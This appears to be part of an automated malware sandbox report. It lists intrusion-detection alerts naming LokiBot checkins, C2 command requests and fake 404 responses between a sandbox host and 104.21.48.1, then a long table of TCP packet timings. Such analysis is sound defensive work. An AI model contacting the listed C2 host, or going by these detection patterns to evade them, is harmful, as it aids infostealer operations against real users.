2025-02-24T08:42:08.365524+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50120	104.21.48.1	80	TCP
2025-02-24T08:42:08.365524+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50120	104.21.48.1	80	TCP
2025-02-24T08:42:08.985730+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50120	104.21.48.1	80	TCP
2025-02-24T08:42:08.985730+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50120	104.21.48.1	80	TCP
2025-02-24T08:42:08.992887+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50120	TCP
2025-02-24T08:42:09.184226+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:09.184226+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:09.184226+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:09.808134+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:09.808134+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:09.813147+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50121	TCP
2025-02-24T08:42:09.985917+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:09.985917+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:09.985917+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:10.648907+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:10.648907+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:10.653938+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50122	TCP
2025-02-24T08:42:10.825701+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:10.825701+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:10.825701+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:11.474042+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:11.474042+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:11.479124+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50123	TCP
2025-02-24T08:42:11.653601+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:11.653601+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:11.653601+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:12.422371+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:12.422371+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:12.595333+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:12.595333+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:12.595333+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:13.231254+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:13.231254+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:13.236374+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50125	TCP
2025-02-24T08:42:13.404659+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:13.404659+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:13.404659+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:14.158432+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:14.158432+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:14.333926+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:14.333926+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:14.333926+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:15.116374+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:15.116374+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:15.122305+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50127	TCP
2025-02-24T08:42:15.296100+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:15.296100+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:15.296100+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:15.914469+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:15.914469+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:15.921705+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50128	TCP
2025-02-24T08:42:16.085309+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50129	104.21.48.1	80	TCP
2025-02-24T08:42:16.085309+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50129	104.21.48.1	80	TCP
2025-02-24T08:42:16.085309+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50129	104.21.48.1	80	TCP
2025-02-24T08:42:16.704731+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50129	104.21.48.1	80	TCP
2025-02-24T08:42:16.704731+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50129	104.21.48.1	80	TCP
2025-02-24T08:42:16.710826+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50129	TCP
2025-02-24T08:42:16.940915+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50130	104.21.48.1	80	TCP
2025-02-24T08:42:16.940915+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50130	104.21.48.1	80	TCP
2025-02-24T08:42:16.940915+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50130	104.21.48.1	80	TCP
2025-02-24T08:42:17.694143+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50130	104.21.48.1	80	TCP
2025-02-24T08:42:17.694143+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50130	104.21.48.1	80	TCP
2025-02-24T08:42:17.699247+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50130	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2025 08:40:16.790338039 CET	49731	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:16.795404911 CET	80	49731	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:16.795478106 CET	49731	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:16.797329903 CET	49731	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:16.802356958 CET	80	49731	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:16.802412033 CET	49731	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:16.807444096 CET	80	49731	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:17.542422056 CET	80	49731	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:17.542872906 CET	49731	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:17.543431044 CET	80	49731	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:17.543497086 CET	49731	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:17.547939062 CET	80	49731	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:17.888798952 CET	49732	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:17.893985987 CET	80	49732	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:17.894064903 CET	49732	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:17.896800995 CET	49732	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:17.901879072 CET	80	49732	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:17.901954889 CET	49732	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:17.907004118 CET	80	49732	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:18.709151983 CET	80	49732	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:18.709316015 CET	49732	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:18.709656954 CET	80	49732	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:18.709706068 CET	49732	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:18.714627028 CET	80	49732	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:18.774952888 CET	49733	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:18.780071974 CET	80	49733	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:18.780160904 CET	49733	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:18.782649040 CET	49733	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:18.787724972 CET	80	49733	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:18.787787914 CET	49733	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:18.792848110 CET	80	49733	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:19.532658100 CET	80	49733	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:19.532963037 CET	49733	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:19.533220053 CET	80	49733	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:19.533305883 CET	49733	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:19.538068056 CET	80	49733	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:19.675720930 CET	49734	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:19.680890083 CET	80	49734	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:19.684616089 CET	49734	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:19.686355114 CET	49734	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:19.692305088 CET	80	49734	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:19.696594954 CET	49734	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:19.705513000 CET	80	49734	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:20.447648048 CET	80	49734	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:20.447784901 CET	49734	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:20.447844028 CET	80	49734	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:20.447884083 CET	49734	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:20.452902079 CET	80	49734	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:20.585383892 CET	49735	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:20.590989113 CET	80	49735	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:20.591109037 CET	49735	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:20.593018055 CET	49735	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:20.599725008 CET	80	49735	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:20.599802017 CET	49735	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:20.605042934 CET	80	49735	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:21.324126005 CET	80	49735	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:21.324302912 CET	49735	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:21.324665070 CET	80	49735	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:21.324726105 CET	49735	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:21.329360962 CET	80	49735	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:21.489816904 CET	49736	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:21.495050907 CET	80	49736	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:21.495238066 CET	49736	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:21.498051882 CET	49736	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:21.503113985 CET	80	49736	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:21.503175974 CET	49736	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:21.508182049 CET	80	49736	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:22.245167971 CET	80	49736	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:22.245346069 CET	49736	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:22.245603085 CET	80	49736	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:22.245661974 CET	49736	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:22.250461102 CET	80	49736	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:22.390547991 CET	49737	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:22.395999908 CET	80	49737	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:22.396095991 CET	49737	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:22.399348974 CET	49737	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:22.404541016 CET	80	49737	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:22.404608011 CET	49737	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:22.409650087 CET	80	49737	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:23.122205973 CET	80	49737	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:23.122370005 CET	49737	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:23.123037100 CET	80	49737	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:23.123106003 CET	49737	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:23.127707958 CET	80	49737	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:23.275682926 CET	49738	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:23.281074047 CET	80	49738	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:23.281181097 CET	49738	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:23.284168959 CET	49738	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:23.289244890 CET	80	49738	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:23.289335012 CET	49738	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:23.294429064 CET	80	49738	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:24.055237055 CET	80	49738	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:24.055329084 CET	49738	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:24.056124926 CET	80	49738	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:24.056174040 CET	49738	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:24.060334921 CET	80	49738	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:24.205617905 CET	49739	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:24.210827112 CET	80	49739	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:24.210902929 CET	49739	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:24.213011980 CET	49739	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:24.218084097 CET	80	49739	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:24.218132973 CET	49739	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:24.223207951 CET	80	49739	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:25.001928091 CET	80	49739	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:25.002119064 CET	49739	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:25.002546072 CET	80	49739	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:25.002624035 CET	49739	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:25.007428885 CET	80	49739	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:25.152044058 CET	49740	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:25.157210112 CET	80	49740	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:25.157310009 CET	49740	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:25.159491062 CET	49740	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:25.164549112 CET	80	49740	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:25.164608002 CET	49740	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:25.169682026 CET	80	49740	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:25.918689966 CET	80	49740	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:25.918929100 CET	49740	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:25.919013977 CET	80	49740	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:25.919095039 CET	49740	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:25.924180031 CET	80	49740	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:26.076102972 CET	49741	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:26.081376076 CET	80	49741	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:26.081629038 CET	49741	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:26.083956003 CET	49741	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:26.089121103 CET	80	49741	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:26.089206934 CET	49741	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:26.094377995 CET	80	49741	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:26.879177094 CET	80	49741	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:26.880209923 CET	80	49741	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:26.880322933 CET	49741	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:26.881695032 CET	49741	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:26.886827946 CET	80	49741	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:27.030316114 CET	49742	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.035628080 CET	80	49742	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:27.035723925 CET	49742	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.037647963 CET	49742	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.042670012 CET	80	49742	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:27.042767048 CET	49742	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.047795057 CET	80	49742	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:27.805233002 CET	80	49742	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:27.805427074 CET	80	49742	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:27.805449963 CET	49742	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.805500984 CET	49742	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.810555935 CET	80	49742	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:27.960438013 CET	49743	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.965641975 CET	80	49743	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:27.965745926 CET	49743	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.972408056 CET	49743	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.977415085 CET	80	49743	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:27.977477074 CET	49743	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:27.982518911 CET	80	49743	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:28.693880081 CET	80	49743	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:28.694032907 CET	49743	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:28.694820881 CET	80	49743	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:28.694889069 CET	49743	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:28.699251890 CET	80	49743	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:28.848664999 CET	49744	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:28.853880882 CET	80	49744	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:28.853969097 CET	49744	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:28.855746031 CET	49744	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:28.861002922 CET	80	49744	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:28.861062050 CET	49744	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:28.866328955 CET	80	49744	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:29.628328085 CET	80	49744	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:29.628482103 CET	49744	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:29.628895044 CET	80	49744	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:29.628968000 CET	49744	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:29.633516073 CET	80	49744	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:29.803896904 CET	49746	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:29.808999062 CET	80	49746	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:29.809287071 CET	49746	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:29.812041998 CET	49746	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:29.817055941 CET	80	49746	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:29.817332029 CET	49746	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:29.822396994 CET	80	49746	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:30.607261896 CET	80	49746	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:30.607398033 CET	49746	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:30.607664108 CET	80	49746	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:30.607733011 CET	49746	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:30.612533092 CET	80	49746	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:30.769385099 CET	49750	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:30.774817944 CET	80	49750	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:30.774919987 CET	49750	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:30.777867079 CET	49750	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:30.782980919 CET	80	49750	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:30.783052921 CET	49750	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:30.788228989 CET	80	49750	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:31.518030882 CET	80	49750	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:31.518249989 CET	49750	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:31.519224882 CET	80	49750	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:31.519746065 CET	49750	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:31.523361921 CET	80	49750	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:31.666960001 CET	49752	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:31.672070980 CET	80	49752	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:31.672175884 CET	49752	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:31.675163984 CET	49752	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:31.680232048 CET	80	49752	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:31.680291891 CET	49752	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:31.685345888 CET	80	49752	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:32.429537058 CET	80	49752	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:32.430097103 CET	80	49752	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:32.430174112 CET	49752	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:32.452372074 CET	49752	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:32.457461119 CET	80	49752	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:32.611749887 CET	49754	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:32.616915941 CET	80	49754	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:32.619153976 CET	49754	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:32.621103048 CET	49754	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:32.626086950 CET	80	49754	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:32.626523972 CET	49754	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:32.631622076 CET	80	49754	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:33.347521067 CET	80	49754	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:33.347666979 CET	49754	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:33.347846031 CET	80	49754	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:33.347909927 CET	49754	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:33.352749109 CET	80	49754	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:33.495816946 CET	49755	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:33.500905991 CET	80	49755	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:33.501015902 CET	49755	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:33.502810001 CET	49755	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:33.507838011 CET	80	49755	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:33.507917881 CET	49755	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:33.512914896 CET	80	49755	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:34.228279114 CET	80	49755	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:34.228413105 CET	49755	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:34.229047060 CET	80	49755	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:34.229137897 CET	49755	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:34.233443022 CET	80	49755	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:34.364924908 CET	49756	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:34.370194912 CET	80	49756	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:34.371180058 CET	49756	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:34.372994900 CET	49756	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:34.377993107 CET	80	49756	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:34.380611897 CET	49756	80	192.168.2.4	104.21.48.1
